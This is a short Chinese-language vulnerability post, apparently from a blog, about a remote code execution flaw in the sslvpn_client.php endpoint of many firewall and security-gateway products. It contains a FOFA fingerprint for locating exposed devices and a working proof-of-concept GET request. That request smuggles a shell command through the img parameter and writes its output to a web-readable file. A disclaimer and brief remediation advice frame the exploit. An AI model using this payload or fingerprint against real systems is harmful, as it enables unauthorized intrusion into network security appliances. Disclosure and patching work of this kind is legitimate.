前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、影响范围

目前已知的存在该漏洞的产品:

H3C-下一代防火墙

安全信息-明御安全网关

MAIPU-安全网关

D-Link-下一代防火墙

Huawei-产品

迈普通信技术股份有限公司安全网关

博达通信-下一代防火墙

任天行网络安全管理系统/安全审计系统

安博通应用网关

烽火网络安全审计

瑞斯康达科技发展股份有限公司安全路由器

任子行网络安全审计系统

绿盟安全审计系统

深圳市鑫塔科技有限公司第二代防火墙

海康威视安全网关

优炫防火墙

SG-8000深度安全网关

网御星云上网行为管理系统

360上网行为审计系统

二、漏洞描述

该漏洞可执行远程代码

三、复现环境

FOFA:body=“/webui/images/default/default/alert_close.jpg”

四、漏洞复现

1.访问存在漏洞的网站,抓包

2.POC

GET /sslvpn/sslvpn_client.php?client=logoImg&img=y%20|echo%20%60pwd%60%20|tee%20/usr/local/webui/sslvpn/check.txt HTTP/1.1

Host: IP-port

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

3.访问http://ip:port/sslvpn/check.txt,成功

五、修复建议

1.过滤请求url中的敏感字符 2.暂时将sslvpn_client.php文件删除 3.关注厂家漏洞修复信息,及时更新

参考链接

https://mp.weixin.qq.com/s/ZzZZdlOpUuWzwR0HSCfuPA

相关阅读

评论可见,请评论后查看内容,谢谢!!!评论后请刷新页面。